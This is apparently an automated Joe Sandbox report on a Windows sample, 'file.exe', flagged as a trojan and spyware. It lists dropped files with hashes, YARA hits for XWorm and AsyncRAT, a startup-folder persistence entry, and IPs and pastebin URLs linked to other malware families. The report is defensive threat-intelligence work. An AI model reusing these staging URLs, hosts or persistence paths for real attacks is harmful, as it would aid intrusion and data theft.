                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 11m 44s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Number of analysed new started processes analysed:38
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:1
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:file.exe
                          Detection:MAL
                          Classification:mal100.troj.spyw.expl.evad.winEXE@28/14@2/3
                          EGA Information:
                          • Successful, ratio: 75%
                          HCA Information:
                          • Successful, ratio: 73%
                          • Number of executed functions: 207
                          • Number of non-executed functions: 73
                          Cookbook Comments:
                          • Found application associated with file extension: .exe
                          • Override analysis time to 240000 for current running targets taking high CPU consumption
                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, consent.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe, UsoClient.exe
                          • Excluded IPs from analysis (whitelisted): 4.231.128.59, 93.184.221.240, 40.126.32.140, 40.126.32.72, 20.190.160.14, 40.126.32.76, 40.126.32.133, 40.126.32.74, 20.190.160.22, 20.190.160.20, 20.101.57.9, 51.104.136.2, 51.124.78.146, 40.68.123.157, 13.95.31.18, 13.85.23.86, 52.165.164.15
                          • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, twc.trafficmanager.net, settings-prod-neu-2.northeurope.cloudapp.azure.com, wu.azureedge.net, atm-settingsfe-prod-geo2.trafficmanager.net, login.live.com, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, glb.cws.prod.dcat.dsp.trafficmanager.net, hlb.apr-52dd2-0.edgecastdns.net, sls.update.microsoft.com, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net, settings-prod-weu-1.westeurope.cloudapp.azure.com, prdv4a.aadg.msidentity.com, ctldl.windowsupdate.com.delivery.microsoft.com, wu.ec.azureedge.net, www.tm.v4.a.prd.aadg.trafficmanager.net, settings-win.data.microsoft.com, ctldl.windowsupdate.com, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, settings-prod-neu-3.northeurope.cloudapp.azure.com, www.tm.lg.prod.aadmsa.trafficmanager.net
                          • Execution Graph export aborted for target MSBuild.exe, PID 2908 because it is empty
                          • Execution Graph export aborted for target OpenWith.exe, PID 7560 because there are no executed function
                          • Not all processes where analyzed, report is missing behavior information
                          • Report size exceeded maximum capacity and may have missing behavior information.
                          • Report size getting too big, too many NtOpenFile calls found.
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtQueryDirectoryFile calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.
                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                          • VT rate limit hit for: file.exe
                          TimeTypeDescription
                          14:00:59API Interceptor6272044x Sleep call for process: MSBuild.exe modified
                          14:00:59API Interceptor1x Sleep call for process: wmplayer.exe modified
                          20:00:43AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\browserUninstall_x86.lnk
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          104.20.4.235envifa.vbsGet hashmaliciousRemcosBrowse
                          • pastebin.com/raw/V9y5Q5vv
                          New Voicemail Invoice 64746w .jsGet hashmaliciousWSHRATBrowse
                          • pastebin.com/raw/NsQ5qTHr
                          Invoice Payment N8977823.jsGet hashmaliciousWSHRATBrowse
                          • pastebin.com/raw/NsQ5qTHr
                          Pending_Invoice_Bank_Details_XLSX.jsGet hashmaliciousWSHRATBrowse
                          • pastebin.com/raw/NsQ5qTHr
                          Pending_Invoice_Bank_Details_kofce_.JS.jsGet hashmaliciousWSHRATBrowse
                          • pastebin.com/raw/NsQ5qTHr
                          Update on Payment.jsGet hashmaliciousWSHRATBrowse
                          • pastebin.com/raw/NsQ5qTHr
                          85.209.133.150kr5u9eDLvb.exeGet hashmaliciousXWormBrowse
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            pastebin.comFrench Group.jsGet hashmaliciousRemcosBrowse
                            • 104.20.4.235
                            SecuriteInfo.com.Win64.MalwareX-gen.4290.27796.exeGet hashmaliciousUnknownBrowse
                            • 172.67.19.24
                            SecuriteInfo.com.Win64.MalwareX-gen.4290.27796.exeGet hashmaliciousUnknownBrowse
                            • 104.20.3.235
                            French Group.jsGet hashmaliciousRemcosBrowse
                            • 104.20.3.235
                            Mi_Documento.jsGet hashmaliciousAsyncRAT, DcRatBrowse
                            • 104.20.3.235
                            French Group.jsGet hashmaliciousUnknownBrowse
                            • 172.67.19.24
                            xnxx.exeGet hashmaliciousUnknownBrowse
                            • 104.20.3.235
                            sostener.vbsGet hashmaliciousRemcosBrowse
                            • 104.20.3.235
                            pxkGBmsm1Y.exeGet hashmaliciousDCRatBrowse
                            • 104.20.3.235
                            yyTqxbOXbF.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                            • 104.20.3.235
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            SKHT-ASShenzhenKatherineHengTechnologyInformationCoPRICE REQUEST RSM PQ24.docx.docGet hashmaliciousRemcosBrowse
                            • 154.216.19.222
                            SecuriteInfo.com.Exploit.CVE-2018-0798.4.21168.15147.rtfGet hashmaliciousRemcosBrowse
                            • 154.216.19.222
                            PQ2AUndsdb.exeGet hashmaliciousAmadey, AsyncRAT, Cryptbot, PureLog Stealer, RedLine, SmokeLoader, StealcBrowse
                            • 154.216.18.223
                            ORDER PO 40192005315.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                            • 154.216.20.37
                            SecuriteInfo.com.NSIS.Runner.AV.tr.19719.14302.exeGet hashmaliciousUnknownBrowse
                            • 154.216.20.190
                            file.exeGet hashmaliciousPython Stealer, Amadey, Cryptbot, Monster Stealer, PureLog Stealer, RedLine, SmokeLoaderBrowse
                            • 154.216.18.223
                            SecuriteInfo.com.Win32.MalwareX-gen.20431.17656.exeGet hashmaliciousXWormBrowse
                            • 154.216.18.213
                            file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, PureLog Stealer, RedLine, SmokeLoader, StealcBrowse
                            • 154.216.18.223
                            SecuriteInfo.com.Win32.PWSX-gen.17334.14366.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                            • 154.216.20.211
                            jasht.arm5.elfGet hashmaliciousGafgyt, MiraiBrowse
                            • 154.216.18.202
                            CLOUDFLARENETUSinstruction_3.pdf lnk.lnkGet hashmaliciousLummaCBrowse
                            • 172.67.132.84
                            file.exeGet hashmaliciousLummaCBrowse
                            • 188.114.97.3
                            ATT09876.htmGet hashmaliciousHTMLPhisherBrowse
                            • 172.67.70.233
                            file.exeGet hashmaliciousUnknownBrowse
                            • 172.64.41.3
                            FedEx Shipping Confirmation.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                            • 104.21.67.152
                            ocedures.msgGet hashmaliciousUnknownBrowse
                            • 104.17.25.14
                            Smeg SignRequest.pdfGet hashmaliciousHTMLPhisherBrowse
                            • 188.114.97.3
                            Murexltd Mail Security Update Required For gjohnson@murexltd.com.msgGet hashmaliciousHTMLPhisherBrowse
                            • 104.17.25.14
                            PO_111234242 6553432.exeGet hashmaliciousXeno StealerBrowse
                            • 104.26.13.205
                            RFQ-MR-24-09101 .xlsGet hashmaliciousUnknownBrowse
                            • 162.159.134.233
                            CMCSUSM12_20240821.xlsGet hashmaliciousRemcosBrowse
                            • 45.90.89.98
                            7jJ5MmlHbSHkdkHmvUSAjcUp2P2shzjYzN.elfGet hashmaliciousUnknownBrowse
                            • 95.214.27.215
                            5W1oMx0mvDdA5qxT1IJjtPL48vEFbOM1gh.elfGet hashmaliciousUnknownBrowse
                            • 95.214.27.215
                            b4JF06gZTMJpnYlsUOImGOM77xqMU1h8u3.elfGet hashmaliciousUnknownBrowse
                            • 95.214.27.215
                            FtxaQtUvjBYIMfEEaq6CUaPLqJCNXnjMDz.elfGet hashmaliciousUnknownBrowse
                            • 95.214.27.215
                            f4rgX4ruBw0IqdorzUGWIF1EBpCY4DpfH7.elfGet hashmaliciousUnknownBrowse
                            • 95.214.27.215
                            E2DOzYCJe9OYVW5SsJ2Jg6aTHfwMbZ7cur.elfGet hashmaliciousUnknownBrowse
                            • 95.214.27.215
                            g92VW6HmXFjoaY59hp7I27MOMpwpqH3P9p.elfGet hashmaliciousUnknownBrowse
                            • 95.214.27.215
                            KYt69aM0Jgz04AE6lMagZrayDAjhqRjmaW.elfGet hashmaliciousUnknownBrowse
                            • 95.214.27.215
                            jDompfBEAo5nBGaxxoiVa9alIryPld6eeh.elfGet hashmaliciousUnknownBrowse
                            • 95.214.27.215
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            3b5074b1b5d032e5620f69f9f700ff0einstruction_3.pdf lnk.lnkGet hashmaliciousLummaCBrowse
                            • 104.20.4.235
                            ATT09876.htmGet hashmaliciousHTMLPhisherBrowse
                            • 104.20.4.235
                            FedEx Shipping Confirmation.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                            • 104.20.4.235
                            Vak#U0131fBank - #U00d6deme onay makbuzu 20240826.pdf.exeGet hashmaliciousQuasarBrowse
                            • 104.20.4.235
                            #U00d6deme Talebi_27.08.2024.exeGet hashmaliciousAgentTeslaBrowse
                            • 104.20.4.235
                            New_Order_Big_Bag_PDF.exeGet hashmaliciousFormBookBrowse
                            • 104.20.4.235
                            Faktura.vbsGet hashmaliciousRemcosBrowse
                            • 104.20.4.235
                            PAYMENT SV 31 FATURA.exeGet hashmaliciousUnknownBrowse
                            • 104.20.4.235
                            PAYMENT SV 31 FATURA.exeGet hashmaliciousUnknownBrowse
                            • 104.20.4.235
                            PO_111234242 6553432.exeGet hashmaliciousXeno StealerBrowse
                            • 104.20.4.235
                            caec7ddf6889590d999d7ca1b76373b6QIkZ7aeVBV.msiGet hashmaliciousDanaBot, RHADAMANTHYSBrowse
                            • 154.216.19.149
                            SensApi.dllGet hashmaliciousRHADAMANTHYSBrowse
                            • 154.216.19.149
                            s6K4JjTwtz.exeGet hashmaliciousRHADAMANTHYSBrowse
                            • 154.216.19.149
                            IrJIw2lsaB.msiGet hashmaliciousRHADAMANTHYSBrowse
                            • 154.216.19.149
                            ptuNVk3HeK.exeGet hashmaliciousRHADAMANTHYSBrowse
                            • 154.216.19.149
                            uf0VrlE1bR.exeGet hashmaliciousRHADAMANTHYSBrowse
                            • 154.216.19.149
                            XaEvV3DPc7.exeGet hashmaliciousRHADAMANTHYSBrowse
                            • 154.216.19.149
                            TkeeN4qh4z.exeGet hashmaliciousRHADAMANTHYSBrowse
                            • 154.216.19.149
                            qc.ps1Get hashmaliciousGuLoader, RHADAMANTHYSBrowse
                            • 154.216.19.149
                            yd2.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                            • 154.216.19.149
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            C:\Users\user\AppData\Local\Temp\SendBugReportNew.exeQvbimOZ2Ww.exeGet hashmaliciousLummaCBrowse
                              https://www.iobit.com/en/advanceduninstaller.phpGet hashmaliciousUnknownBrowse
                                iobituninstaller.exeGet hashmaliciousUnknownBrowse
                                  iobituninstaller.exeGet hashmaliciousUnknownBrowse
                                    C:\Users\user\AppData\Local\Temp\vcl120.bplArchivevalidv4.exeGet hashmaliciousRemcosBrowse
                                      https://www.iobit.com/en/advanceduninstaller.phpGet hashmaliciousUnknownBrowse
                                        iobituninstaller.exeGet hashmaliciousUnknownBrowse
                                          iobituninstaller.exeGet hashmaliciousUnknownBrowse
                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):323
                                            Entropy (8bit):5.363435887027673
                                            Encrypted:false
                                            SSDEEP:6:Q3La/xwcz92W+P12MUAvvr3tDLIP12MUAvvR+uTL2ql2ABgTv:Q3La/hz92n4M9tDLI4MWuPTAv
                                            MD5:A92E44C0313DAFEC1988D0D379E41A2F
                                            SHA1:C2F5644C418A81C1FB40F74298FF39D1420BFAC0
                                            SHA-256:F3F3E681BE07C36042639B1679ACF8B2D23BE037713D5E395C48006840DBE77A
                                            SHA-512:4F32FE6F35FC6EB4D4CF41EDEDE3C6B3FDFE31E58DA6FC7B301B1EBD3FBEEE64681C928B45E87CD556A1D32D32CB5932764EAB22FFEE11E42B8D5EB0DCFDC22C
                                            Malicious:false
                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..
                                            Process:C:\Users\user\Desktop\file.exe
                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                            Category:modified
                                            Size (bytes):1312792
                                            Entropy (8bit):6.788056062689588
                                            Encrypted:false
                                            SSDEEP:24576:NpzWZ5CkBgB9IxAr7BptfYfG1inqCi2BZbqvWmAUlddWdBMTvNisj273HY:85CkyBbr7vbgHi2HAYwT1H274
                                            MD5:58717509C1521EACFCC7CDA39E6BD45C
                                            SHA1:5102DC3A82E8A2710AC67521F85F43F5296B5045
                                            SHA-256:D76D0650B630FDB70756A446E0A43672B5DA1C2A74014118B02133923305DA9A
                                            SHA-512:C637C2960B8A0BC111B408AF05A0879D9A10F05D802EE7B8B9F115CB54606F76F4475375CECFA9FDB0518BE0340B2C5BD23F8FE100DC21DB88287A9227C0E69F
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: ReversingLabs, Detection: 0%
                                            Joe Sandbox View:
                                            • Filename: QvbimOZ2Ww.exe, Detection: malicious, Browse
                                            • Filename: , Detection: malicious, Browse
                                            • Filename: iobituninstaller.exe, Detection: malicious, Browse
                                            • Filename: iobituninstaller.exe, Detection: malicious, Browse
                                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...{x.`............................$.............@..........................P...................@...................@..W........@... ..D!...............B...p...............................`.......................................................text...x........................... ..`.itext.............................. ..`.data...............................@....bss.....................................idata...@.......B..................@....edata..W....@......................@..@.tls.........P...........................rdata.......`......................@..@.reloc.......p......................@..B.rsrc...D!... ..."..................@..@.....................D..............@..@........................................................
                                            Process:C:\Windows\SysWOW64\cmd.exe
                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                            Category:modified
                                            Size (bytes):33280
                                            Entropy (8bit):5.580843960508835
                                            Encrypted:false
                                            SSDEEP:384:OHxRXcrP31VZBELR1nvJff3cdiwOURJpkFTBLToOZwxJd2v99Ikuisk2VFxOjhXv:nPjgR5vJ3cdIUGF/9jmOjhXbr
                                            MD5:3C037C127FF204C10F15866F0A47ACD0
                                            SHA1:EB1736A2E311BC34B8BF2DC6768878E16731D5A1
                                            SHA-256:AEB211A2085D38ED9FBB863E8B492DEB8CBF911ACE382B1ECD3B2CCD01298A47
                                            SHA-512:41A0A0B8A60F492468CB5467B3F2D2991D7B503174D26E34E6C605CC1A0A5203506D0F283C833E9624041D3F4AFC2B74A30F894DAE5B5359DB14B78C8A493B9B
                                            Malicious:true
                                            Yara Hits:
                                            • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\cfi, Author: Joe Security
                                            • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\cfi, Author: ditekSHen
                                            Antivirus:
                                            • Antivirus: Avira, Detection: 100%
                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....1.M.................x..........~.... ........@.. ....................................@.................................(...S.................................................................................... ............... ..H............text....w... ...x.................. ..`.rsrc................z..............@..@.reloc..............................@..B................`.......H.......,O...G............................................................(....*..(....*.s.........s.........s.........s.........*...0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0............(....(.....+..*....0...........(.....+..*..0...............(.....+..*..0...........(.....+..*..0................-.(...+.+.+...+..*.0.........................*..(....*.0.. .......~.........-.(...+.....~.....+..*..(....*.0..
                                            Process:C:\Users\user\AppData\Local\Temp\SendBugReportNew.exe
                                            File Type:data
                                            Category:modified
                                            Size (bytes):1201505
                                            Entropy (8bit):7.139167390831655
                                            Encrypted:false
                                            SSDEEP:24576:2TXn5v2ANwjrpcJEIODJiv/ksez0/GxF3pI+Wl4L90:2Tl2nplIOSM/3y4L90
                                            MD5:5E13641E6071805A61A25087D7C2FAD3
                                            SHA1:E3767A0B17F5F20010D79104231B5B74FE4F6578
                                            SHA-256:0410DE24162EFAED306F140FD7802D582833FF7D00B12C8539490D422B54904F
                                            SHA-512:5C65059371FA0F436614D5651A5E08A6EA5DFE7779D0CD1DA3CCBB6C04E18CFAF41E221FA4EF17AB47B19825548922F40F2C2AF71F171E1A6E90BAD3ABBBB029
                                            Malicious:false
                                            Preview:..+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...*...{......f...D..._...E...X...J..f...w...L...X...J...[...+...+...+...+...+...+...+...+...+...+...+...b...B...Q...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...h..._...X...H.+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...b...y...B...X.......w...F...Y.+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+..........+...+...+...+...+...+...+...+...+...+...+.
                                            Process:C:\Users\user\AppData\Local\Temp\SendBugReportNew.exe
                                            File Type:data
                                            Category:modified
                                            Size (bytes):1201505
                                            Entropy (8bit):7.139172707256793
                                            Encrypted:false
                                            SSDEEP:24576:1TXn5v2ANwjrpcJEIODJiv/ksez0/GxF3pI+Wl4L90:1Tl2nplIOSM/3y4L90
                                            MD5:8EC1936C424DBB4C4F53522D4A6B8CED
                                            SHA1:65550DABD9971E94119333A36F5E5042878EF569
                                            SHA-256:04EA742EA18A0F107C0C66710B53DF4FA5EE36C90C3D1B3AC31BAE231AF5F6AA
                                            SHA-512:022CEC702282F49D4A66AE51F2A70976577EFFBEE64D6A8994A3DCEBE6E8F8B9AF93AC27303962CE26ACAAFEB86844D76CD7BC87B62587BE43E9309635CE8049
                                            Malicious:false
                                            Preview:..+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...*...{......f...D..._...E...X...J..f...w...L...X...J...[...+...+...+...+...+...+...+...+...+...+...+...b...B...Q...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...h..._...X...H.+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...b...y...B...X.......w...F...Y.+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+..........+...+...+...+...+...+...+...+...+...+...+.
                                            Process:C:\Users\user\AppData\Local\Temp\SendBugReportNew.exe
                                            File Type:data
                                            Category:modified
                                            Size (bytes):1201505
                                            Entropy (8bit):7.1391711002032086
                                            Encrypted:false
                                            SSDEEP:24576:KTXn5v2ANwjrpcJEIODJiv/ksez0/GxF3pI+Wl4L90:KTl2nplIOSM/3y4L90
                                            MD5:FE4622D80D5F292A4B5EFE427CC0DB36
                                            SHA1:139A69BF1809160A42EEBC227840D7D4F887A708
                                            SHA-256:FE2AF8CD642848585F999D04EE4CA54E62CD965D40A5ED1BD671BD668B0815EE
                                            SHA-512:6D882798B46755E8EDEC3088C05AA85C239C2D970A8428A51F996B46EBB8665C9D007276662882425BA93911770832E3C90824253CE97C8DA503F02390C62AFB
                                            Malicious:false
                                            Preview:..+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...*...{......f...D..._...E...X...J..f...w...L...X...J...[...+...+...+...+...+...+...+...+...+...+...+...b...B...Q...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...h..._...X...H.+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...b...y...B...X.......w...F...Y.+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+...+..........+...+...+...+...+...+...+...+...+...+...+.
                                            Process:C:\Users\user\Desktop\file.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):983500
                                            Entropy (8bit):7.601895498001173
                                            Encrypted:false
                                            SSDEEP:24576:44RKraqOVA2HlEkR/iQugC20E8TsveTqu3:orabVj2kR/Oz5svemu3
                                            MD5:6FD4005525F3029CD0E664E5729F048D
                                            SHA1:BCDD6ED97C89C33E24F15CC76DDF6A8DB9136218
                                            SHA-256:20353143A20E7962473B12A4614B0874327C130A309F6D7B15AC5FD7214C2D13
                                            SHA-512:0CF2A9ABC6D92628C226E0D86203532105234BE5E0BB519F8A7F564F3C4B5514E6F3A682EC1EE16A61AFF34AFC2A26110B9E0B8BDFA191EE7C1F7F0A16D9EEB9
                                            Malicious:false
                                            Preview:uI..OZ..BP..Z..r..e.w].sFA...vM.C.`mdH.tpj..[e.G.f..c...y.lvE....WJ.h..H.w.f....GC.l....e.]\`TPG......Op..PQA.I..S..d.A..wdiXKl....DKT.Y...k.M.\..vDp..MJIfJ[\k.FKg.Hf..UB...].A.V.D..\.._.Ie..y..lH...B`ea..OjRk\..`.jqG......K.Eq..C\.WiL..g..TY_E.G]Pl.OY.C.....bSGBcR....m....Smbe^qK.Qvlj...........MSpB_.bB......hD.HC...sdYh..ht.Q.....V..wH.]yf..f.p.fJ...f..q.....W`.[.HPuj..vy.Ge.L..^.KF\..D.f..Jq._.K.nu....kK.g..Dkv.u._.V.m...c._y.PZ.PX^jGE.CV.t.[h_.........KcQ.i....].g..O..iqF.s......j.m^Oa.V.A.vEKlJc.vb.H.Q........YI.ss.FMY..VW`.....sQv..Y.N..`.Lv.vQ.uch..A...\R...xE...x.p.......Jd.oH.Y...NK.....mm.khZ..S.LbIK...F..UN..o.G.u.g.pcPpE...GJ.K.`.....JF...US..HI.nS..........umJN......QCb..gX...oxG.b]M.]..eq.Z..oY....C..E.U\.UA...tcp`MV.....Xv.k.lwg.X`..P..JE..yo....t.w.Zr.D..pR[nx..Ls.olPmF..ya.t..qjlC.y_T........h.ef^N.KpAv.B..Wk...F..X^.PP.HxV.I.YG..TLK...lQ.c...Z.sfsYH....yq..I..\....Wm...cM.k.O.K.^..u..........`Z.s.HiIC.Hh.t.t......F^.Os.Pj`..Q...eIU.Z.yD.....nl.WKL.....cV.ba.O.Q..c.C..
                                            Process:C:\Users\user\Desktop\file.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):31958
                                            Entropy (8bit):5.0852242171362665
                                            Encrypted:false
                                            SSDEEP:768:OsO+nY4JhielJ7K2hGqUY8sl+11QbQfVrWpnfuAFgF/9qTSRK:OsZY4JrE2Enuffcqmw
                                            MD5:8ADE14406162E1ACD567B99843AEAFB9
                                            SHA1:76886AB3D6C8C62A9B5FC9D3785B4395E0A75678
                                            SHA-256:A465457514E861E867729368E650B69861E4C8A3EC547A30E67B3AEC77599724
                                            SHA-512:BDE1333A1CD35CB3C24DB0055D1F761F966C68EF3A1B7060AA204F07813B0B697C6DC6700736804D05E41BE15367493A13E1A9897CC5AA5EF1BC831DC6618905
                                            Malicious:false
                                            Preview:....w....YN.c`.A.R.EPvb.Iq.rE^b.....p.._XWnUB.....`sk....q`_d`..G.FaIcBSP..b._M.t..MgkA..._..cU.U..MLIh.a..gr.L.ag`].^..e.ex..wB..hw..f..c.cB]\...f...F..uf.O...[xhoUP..kt.hx..ZYP\Q[d.n\...JRJ.f.PR.jEfR...U....G.o.x......pxUYhQ...C...cZ].xd.BDf....BQ[....r.C.pO._.YWo.x..C.sAr.tAxZsa._jm...nW.]x.X.\.j......x.ym.b...H\.jy.X.km.m..X......ujil....jPSl...xE.S..EBOACG.....oM.S.svEU...Db.jG...G..w.DVeWX..J.wwW.H.u...u........byl.oeMG.XOL^N.UwqN.\..i.G.b.CWW....[.D...i.`N.gb..I..q......cc..N.AX._I.c.x.p....X.h.Cv.O.e.u..Mh..kX..g..IG.ov.W``e.......xVXsvB......t.....u....ELZ..BDceRXr.b..k..g].....[.\if\.B.w.e.u...t.CQaF...HEq.k.N..DXs...Ce..H.qPy\L..Un..a.NY....b.a..`do.J..........VK.Now.^.b\gA..f..a..b...w.f.c...lR^CJ.E.aJ]...a.......aEY...M..t.j..U.y..QJ.g...KPc..kGP....w..i.....mSp..PPEB............jx.]SLw..v.....[C..X.D..jZIXld....J..F\nFQQW.....P]O.r.J...nx..c.qn.TN.F.m..F.C.e..uqC.F.L`o.i.^Y.b..\.wL.gJ]bv....^.v..nf.yk.A....PUx....Y.u...W_U.[OE.....q.N.OWr.[gq.gE.P....f...py^Vc..M..`..j.C.
                                            Process:C:\Users\user\Desktop\file.exe
                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):1095168
                                            Entropy (8bit):6.807406814721096
                                            Encrypted:false
                                            SSDEEP:24576:lbh75FWbA1msvIRzM7Rk5JZzSQ4+Is2jMTZ0rbo:W2gTyrbo
                                            MD5:C80F3B711D04C486CCDF3740689B3569
                                            SHA1:C8724122282A018F8FB9F8775D0615311DA4FD70
                                            SHA-256:A4DF6624A65C83002E97D81D96BD85C3B1370129C486BD43CB399E76A6E4D393
                                            SHA-512:E977A1118B3B94FDAC13073E9C60F8E43531CD8F0136F60774FD891175815C3839A316AEF496D6E5C3038CC119DD936356B1D01C521E3BC9C1C01F1BE998D4B7
                                            Malicious:true
                                            Yara Hits:
                                            • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Temp\rtl120.bpl, Author: Joe Security
                                            Antivirus:
                                            • Antivirus: ReversingLabs, Detection: 0%
                                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....g.H...........................................P.........................`.................................................X$...p..........................H.......................................................x............................text.............................. ..`.itext........... .................. ..`.data...tw.......x..................@....bss.... T...@.......(...................idata..X$.......&...(..............@....edata...............N..............@..@.rdata...............0..............@..@.reloc...............2..............@..B.rsrc........p......................@..@.............`......................@..@................................................................................................
                                            Process:C:\Windows\SysWOW64\cmd.exe
                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                            Category:modified
                                            Size (bytes):33280
                                            Entropy (8bit):5.580843960508835
                                            Encrypted:false
                                            SSDEEP:384:OHxRXcrP31VZBELR1nvJff3cdiwOURJpkFTBLToOZwxJd2v99Ikuisk2VFxOjhXv:nPjgR5vJ3cdIUGF/9jmOjhXbr
                                            MD5:3C037C127FF204C10F15866F0A47ACD0
                                            SHA1:EB1736A2E311BC34B8BF2DC6768878E16731D5A1
                                            SHA-256:AEB211A2085D38ED9FBB863E8B492DEB8CBF911ACE382B1ECD3B2CCD01298A47
                                            SHA-512:41A0A0B8A60F492468CB5467B3F2D2991D7B503174D26E34E6C605CC1A0A5203506D0F283C833E9624041D3F4AFC2B74A30F894DAE5B5359DB14B78C8A493B9B
                                            Malicious:true
                                            Yara Hits:
                                            • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\tqco, Author: Joe Security
                                            • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\tqco, Author: ditekSHen
                                            Antivirus:
                                            • Antivirus: Avira, Detection: 100%
                                            • Antivirus: Joe Sandbox ML, Detection: 100%
